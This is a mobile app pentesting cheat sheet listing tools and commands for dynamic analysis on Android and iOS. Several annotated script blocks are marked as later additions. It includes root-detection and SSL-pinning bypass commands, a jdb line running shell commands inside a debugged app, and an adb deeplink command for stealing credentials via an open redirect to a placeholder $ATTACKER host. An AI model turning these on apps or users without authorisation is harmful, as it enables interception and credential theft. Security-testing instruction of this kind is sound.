✅ The Ultimate Cheat Sheet for Android and iOS hacking: Part II (Dynamic Analysis)

Learn how to find vulnerabilities for Android and iOS

pentesting.academy
Jan 1
In this post you will learn how to use different tools and frameworks to audit the security of running apps on Android and Apple smartphones.

“Let’s do some mobile hacking”

Android emulators

  • Genymotion

  • Genymotion Cloud: Cloud-based Android emulators running on SaaS or as virtual images on AWS, GCP or Alibaba Cloud (PaaS)

  • Genymotion Desktop: Desktop Android emulator

  • Android Studio

  • MEMU

  • BlueStacks

  • NoxPlayer

iOS emulators

  • Corellium: iOS emulator for PC (also emulates Android); a platform for security testing

Frameworks for Dynamic Analysis

Frida

Frida is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

Prerequisites for installing Frida:

  • Python 3

How to install Frida on your computer:

sudo pip install frida-tools

Basic commands:

frida-ps

frida-ls-devices

Launch SnapChat and trace crypto API calls:

frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"

Trace the open() and strcmp() calls:

frida-trace -U -i open -i strcmp -f $PACKAGE

Trace Objective-C methods (iOS):

frida-trace -U -m "-[NSView drawRect:]" -f $PACKAGE

frida-trace -U -m "*[$CLASS *]" -f $PACKAGE

Download the frida-server build that matches the phone's CPU architecture (here arm64) and the frida version installed on your computer, then install it on the phone:
https://github.com/frida/frida/releases/download/12.11.12/frida-server-12.11.12-android-arm64.xz

Run the frida server on the phone:

adb shell su -c "chmod 755 /data/local/tmp/frida-server"

adb shell su -c "/data/local/tmp/frida-server" &
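The download, push, chmod and start steps above, put together as one script. This is an added example and not code from the original post or from the Frida project; it assumes adb, curl, xz and frida-tools on the host and a rooted device with su. Its one addition to the manual steps is that it derives the server version from the host's frida client and the architecture from the device's ro.product.cpu.abi, because a mismatch between client and server is the usual reason `frida-ps -U` shows nothing.

```shell
#!/bin/sh
# Added example (not part of the original post): install and start frida-server
# on a rooted Android device. It picks the release asset that matches the
# device ABI and the frida version installed on the host, because a version
# or architecture mismatch is the usual reason "frida-ps -U" finds no device.
# Assumed host tools: adb, curl, xz, frida-tools. Assumed device: rooted, su.
set -eu

# Map ro.product.cpu.abi to the architecture suffix frida uses in its
# release asset names (e.g. frida-server-12.11.12-android-arm64.xz).
frida_arch_for_abi() {
    case "$1" in
        arm64-v8a)             echo "android-arm64" ;;
        armeabi-v7a|armeabi)   echo "android-arm" ;;
        x86)                   echo "android-x86" ;;
        x86_64)                echo "android-x86_64" ;;
        *) echo "unsupported ABI: $1" >&2; return 1 ;;
    esac
}

# GitHub release URL for the given frida version and device ABI.
frida_server_url() {
    ver="$1"
    arch="$(frida_arch_for_abi "$2")" || return 1
    echo "https://github.com/frida/frida/releases/download/$ver/frida-server-$ver-$arch.xz"
}

# Download, push and start frida-server, then confirm the client can reach it.
install_frida_server() {
    # The server must match the client: take the version from the host's frida.
    ver="$(frida --version)"
    # adb shell output ends in CRLF on many devices; strip the CR.
    abi="$(adb shell getprop ro.product.cpu.abi | tr -d '\r')"
    url="$(frida_server_url "$ver" "$abi")"
    echo "fetching $url"
    curl -fsSL "$url" | xz -d > frida-server
    adb push frida-server /data/local/tmp/frida-server
    adb shell su -c "chmod 755 /data/local/tmp/frida-server"
    adb shell su -c "/data/local/tmp/frida-server" &
    sleep 2
    # frida-ps -U lists processes over USB; success means the server answers.
    frida-ps -U > /dev/null && echo "frida-server $ver ($abi) is running"
}

# Only touch a device when explicitly asked, so the helper functions can be
# sourced or checked on a host without adb.
if [ "${1:-}" = "install" ]; then
    install_frida_server
fi
```

Run it as `sh install-frida-server.sh install` with the phone connected; without the argument it only defines the helpers.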

Review:
https://grepharder.github.io/blog/0x03_learning_about_universal_links_and_fuzzing_url_schemes_on_ios_with_frida.html

References:

  • https://www.frida.re/

  • https://awakened1712.github.io/hacking/hacking-frida/

Objection (frida)

Objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture "without the need for a jailbroken or rooted mobile device".

git clone https://github.com/sensepost/objection

cd objection

pip3 install objection

SSL pinning bypass for iOS (run the second command at the objection prompt):

objection -N explore -q
# ios sslpinning disable

SSL pinning bypass for Android (likewise, at the objection prompt):

objection -N explore -q
# android sslpinning disable

References:

  • https://github.com/sensepost/objection

Fridump (frida)

References:

  • http://pentestcorner.com/introduction-to-fridump/: Fridump — Memory dumper tool for Android and iOS

Frameworks for iOS

Needle

Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.

Prerequisites:

  • Jailbroken device

  • Cydia

  • Apt 0.7 Strict

References:

  • https://github.com/mwrlabs/needle

Frameworks for Android

TWRP

  • Pixel 3a https://eu.dl.twrp.me/sargo/

Android Factory/OTA images

  • Unofficial boot.img catalogue https://desktop.firmware.mobi/

  • Factory images: https://developers.google.com/android/images

  • OTA images: https://developers.google.com/android/ota

  • Extract boot.img from a payload.bin in an OTA package: https://github.com/cyxx/extract_android_ota_payload

python3 extract_android_ota_payload/extract_android_ota_payload.py payload.bin . 
Extracting 'boot.img'
Extracting 'system.img'
Extracting 'vbmeta.img'
Extracting 'dtbo.img'
Extracting 'vendor.img'
Extracting 'abl.img'
Extracting 'aop.img'
Extracting 'cmnlib.img'
Extracting 'cmnlib64.img'
Extracting 'devcfg.img'
Extracting 'hyp.img'
Extracting 'keymaster.img'
Extracting 'qupfw.img'
Extracting 'tz.img'
Extracting 'xbl.img'
Extracting 'xbl_config.img'
Extracting 'modem.img'

Xposed

Framework that can change the behaviour of the system and apps without touching any APKs.

References:

  • http://repo.xposed.info/module/de.robv.android.xposed.installer

Drozer

drozer console connect

References:

  • https://github.com/mwrlabs/drozer: The Leading Security Assessment Framework for Android

Cydia

Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected into the target process's memory.

References:

  • http://www.cydiasubstrate.com/

Magisk Manager

Magisk is a suite of open source tools for customizing Android, supporting devices higher than Android 4.2. It covers fundamental parts of Android customization: root, boot scripts, SELinux patches, AVB2.0 / dm-verity / forceencrypt removals etc.

Magisk helps you root your phone and can hide the rooted state from selected apps (e.g. banking apps) so they still run.

  • https://magiskmanager.com/

  • https://github.com/topjohnwu/Magisk

Useful commands using adb

Get Android properties:

adb shell getprop

Get Android Version:

adb shell getprop ro.build.version.release

Get CPU type:

adb shell getprop ro.product.cpu.abi

Set the debuggable property to 1 (ro.* properties are read-only, so a stock image refuses this; Magisk's resetprop, shown in the jdwp section below, works):

adb shell setprop ro.debuggable 1

Take a screenshot of the phone screen:

adb shell screencap -p /sdcard/Download/screencap.png

Record the screen in real time:

adb shell screenrecord --bit-rate 12000000 /sdcard/Download/screen.mp4

Deep link analysis (which apps have verified domains):

adb shell dumpsys package domain-preferred-apps

List installed packages:

adb shell pm list packages -f

Path to the apk file:

adb shell pm path $PACKAGE

Show recent apps:

adb shell dumpsys activity recents

Install app in the phone:

adb install $APK

To install an app distributed as split APKs (Android App Bundles), use install-multiple; installing only the base APK fails with Failure [INSTALL_FAILED_VERIFICATION_FAILURE]. Warning: all APKs must be signed with the same key:

adb install-multiple base.apk $APK1.apk $APK2.apk

Other useful resources inside the package data:

  • /data/data/$PACKAGE/shared_prefs/

Mobile Application Pentest Techniques

Root detection

Bypassing Root Detection:

frida -U --codeshare dzonerzy/fridantiroot -f $PACKAGE

Root Detection:
https://github.com/dpnishant/appmon/blob/master/intruder/scripts/Android/RootDetection.js

SSL Unpinning articles and tools

  • Disabling OkHttp’s SSL Pinning on Android Apps modifying Smali code (2018) https://medium.com/@cooperthecoder/disabling-okhttps-ssl-pinning-on-android-bd116aa74e05

  • Disabling ssl pinning in Pokemon Go 0.31.0 (2016) patching libNianticLabsPlugin.so library https://eaton-works.com/2016/07/31/reverse-engineering-and-removing-pokemon-gos-certificate-pinning/

  • Just Trust Me https://github.com/Fuzion24/JustTrustMe/blob/master/app/src/main/java/just/trust/me/Main.java

  • Frida CodeShare: The Frida CodeShare project is comprised of developers from around the world working together with one goal — push Frida to its limits in new and innovative ways.

Xposed Module: Just Trust Me: Xposed Module to bypass SSL certificate pinning.

adb install ./JustTrustMe.apk

Xposed Module: SSLUnpinning Android Xposed Module to bypass SSL certificate validation (Certificate Pinning).

adb install mobi.acpm.sslunpinning_latest.apk

Cydia Substrate Module: Android SSL Trust Killer: Blackbox tool to bypass SSL certificate pinning for most applications running on a device.

adb install Android-SSL-TrustKiller.apk

Bypassing SSL Pinning with Frida

frida -U --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f $PACKAGE

frida -U -f $PACKAGE -l universal-android-ssl-pinning-bypass-with-frida.js --no-pause

Notes on certificate pinning on Android

Usually, certificate validation in an app is not pinned to a specific certificate but accepts any CA certificate trusted by the system. Therefore, if we install the Burp Suite certificate and trust it on the phone, we can break SSL and intercept all the traffic in plain text with Burp. However, starting with Android 7, apps only trust system Certificate Authorities (CAs) by default and distrust user-installed CA certificates. That means we can still break SSL when browsing HTTPS websites with Chrome, Firefox, etc., BUT we cannot intercept HTTPS connections made by the apps.

To bypass this from the static-analysis side, declare a network security config in AndroidManifest.xml that explicitly trusts user-installed CAs:

<application android:networkSecurityConfig="@xml/network_security_config">

Inside the res/xml/network_security_config.xml file:

<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <domain-config>
        <domain includeSubdomains="true">example.com</domain>
        <trust-anchors>
            <certificates src="@raw/my_ca"/>
            <certificates src="system"/>
            <certificates src="user"/>
        </trust-anchors>
        <pin-set expiration="2018-01-01">
            <pin digest="SHA-256">7HIpactkIAq2Y49orFOOQKurWxmmSFZhBCoQYcRhJ3Y=</pin>
            <!-- backup pin -->
            <pin digest="SHA-256">fwza0LRMXouZHRC8Ei+4PyuldPDcf3UKgO/04cDM1oE=</pin>
        </pin-set>
    </domain-config>
</network-security-config>
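The config above is the weak setting: it trusts user-installed CAs in the release build, so anyone who gets a CA onto a device can intercept the app. The Android-supported way to keep interception possible for testing without shipping it to users is the `<debug-overrides>` element, which is honoured only when the app is built with `android:debuggable="true"`, and whose trust anchors are exempt from the pin-set. The following is an added example, not from the original post; `example.com`, the pin values carried over from the config above and `@raw/burp_ca` are placeholders for the app's own values.

```xml
<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <!-- Release behaviour: only system CAs are trusted (the Android 7+ default),
         and the API host is additionally pinned. -->
    <domain-config>
        <domain includeSubdomains="true">example.com</domain>
        <pin-set expiration="2018-01-01">
            <pin digest="SHA-256">7HIpactkIAq2Y49orFOOQKurWxmmSFZhBCoQYcRhJ3Y=</pin>
            <!-- backup pin -->
            <pin digest="SHA-256">fwza0LRMXouZHRC8Ei+4PyuldPDcf3UKgO/04cDM1oE=</pin>
        </pin-set>
    </domain-config>

    <!-- Applied only when android:debuggable="true" (debug builds): the user
         CA store (where the Burp certificate lands) and a bundled test CA
         (@raw/burp_ca, placeholder) are trusted, and pins are not enforced
         against chains ending in these anchors. Release builds ignore this
         block entirely, so it cannot be abused on installed production apps. -->
    <debug-overrides>
        <trust-anchors>
            <certificates src="user"/>
            <certificates src="@raw/burp_ca"/>
        </trust-anchors>
    </debug-overrides>
</network-security-config>
```

During an assessment this is also what to look for in the decompiled resources: a `<trust-anchors>` block containing `src="user"` inside `<base-config>` or `<domain-config>` (rather than inside `<debug-overrides>`) is a finding, because it weakens every installed copy of the app.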

Or, dynamically, use Frida to hook the SSLContext calls and attach the trust store we want. See https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/

Other references:

  • https://developer.android.com/training/articles/security-config.html#CertificatePinning

  • https://developer.android.com/training/articles/security-ssl.html#UnknownCa

Install the Burp Suite certificate into the system CA store (< Android 10)

Prerequisite: Rooted Android phone

openssl x509 -inform DER -in cacert.der -out cacert.pem

HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)

adb push cacert.pem /sdcard/Download/$HASH.0

adb shell su -c "mount -o rw,remount /system"

adb shell su -c "mv /sdcard/Download/$HASH.0 /system/etc/security/cacerts/"

adb shell su -c "chmod 644 /system/etc/security/cacerts/$HASH.0"

If you prefer to use an app to do that, Root Certificate Manager is a good option: https://play.google.com/store/apps/details?id=net.jolivier.cert.Importer
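The conversion and naming steps above as one script. This is an added example, not code from the original post or from Burp; it assumes openssl on the host. Android looks system CA files up by the legacy OpenSSL subject hash (`-subject_hash_old`), so a file named with the newer `-subject_hash` value is silently ignored, which is the mistake this helper is meant to prevent; it accepts both the DER export that Burp produces and a PEM file, and prints the device-side commands, which still have to be run by hand against the rooted phone.

```shell
#!/bin/sh
# Added example (not part of the original post): prepare the Burp CA
# certificate for the Android system CA store. Android looks CA files up as
# <subject_hash_old>.0, so the file name has to be derived from the
# certificate's subject; this does the conversion and naming on the host and
# prints the adb/mount steps that need the rooted phone. Assumes openssl.
set -eu

# Convert a DER or PEM certificate to PEM, name it <hash>.0 as Android expects,
# write it to the current directory and print the file name.
android_ca_filename() {
    in="$1"
    pem="$(mktemp)"
    # Burp exports DER by default; accept PEM too so either export works.
    if grep -q 'BEGIN CERTIFICATE' "$in" 2>/dev/null; then
        openssl x509 -inform PEM -in "$in" -out "$pem"
    else
        openssl x509 -inform DER -in "$in" -out "$pem"
    fi
    # Android uses OpenSSL's legacy (MD5-based) subject hash: -subject_hash_old.
    # The newer -subject_hash gives a different value and the CA is ignored.
    hash="$(openssl x509 -subject_hash_old -noout -in "$pem")"
    name="$hash.0"
    mv "$pem" "$name"
    chmod 644 "$name"
    echo "$name"
}

# Print the device-side steps for the generated file (rooted phone, < Android 10).
print_install_steps() {
    name="$1"
    cat <<EOF
adb push $name /sdcard/Download/$name
adb shell su -c "mount -o rw,remount /system"
adb shell su -c "mv /sdcard/Download/$name /system/etc/security/cacerts/"
adb shell su -c "chmod 644 /system/etc/security/cacerts/$name"
EOF
}

# With a certificate path as argument: convert it and print the next steps.
if [ "${1:-}" != "" ]; then
    name="$(android_ca_filename "$1")"
    echo "wrote $name"
    print_install_steps "$name"
fi
```

Usage: `sh android-ca.sh cacert.der`, then run the printed adb commands against the rooted phone.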

Mobile phone communications interception

If you want to inspect all phone traffic through Burp Suite, the easiest way, which does NOT need a rooted phone, is to bind Burp's proxy listener to your computer's LAN IP address and set that IP address and port as the proxy in the phone's Wi-Fi settings. This routes all your phone traffic through Burp Suite.

If you are interested only in the traffic of a specific app and you have a rooted phone, ProxyDroid is a good option: https://play.google.com/store/apps/details?id=org.proxydroid

More info: "How to intercept HTTPS with Proxydroid" (Learn Pentesting like a Pro, by jacobo).

Invoke deeplinks manually

How to use an open redirect to steal credentials:

adb shell am start -a android.intent.action.VIEW $INTENT://$DEEPLINK?$PARAM=https://$ATTACKER --ez authentication_header true

Debuggers for Android

jdwp

First recompile the package with android:debuggable="true"

Show the PIDs of debuggable processes:

adb jdwp

Then do port forwarding to the external port and attach to the process:

adb forward tcp:7777 jdwp:$PID

{ echo "suspend"; cat; } | jdb -attach localhost:7777

Useful jdb commands:

  • classes: Lists all classes

  • methods $CLASS: List methods of a class

  • stop in $CLASS.func(): Set a breakpoint in func()

main[1] locals
main[1] next
main[1] print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("pwd").getInputStream())).readLine())
main[1] print name
main[1] set name="foo"
main[1] list
main[1] where
main[1] cont

Instead of repackaging the APK to make it debuggable, try (Magisk's resetprop):

$ adb shell
sailfish:/ $ su
sailfish:/ # resetprop ro.debuggable 1
sailfish:/ # stop
sailfish:/ # start
sailfish:/ # exit
sailfish:/ $ exit
$ adb shell am set-debug-app -w $PACKAGE

Enable debug persistent flag:

adb shell am set-debug-app -w --persistent $PACKAGE

Undo debug persistent flag:

adb shell am clear-debug-app $PACKAGE

gdbserver

adb push $NDK/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp
/data/local/tmp/gdbserver --attach localhost:1234 $PID

References:

  • https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
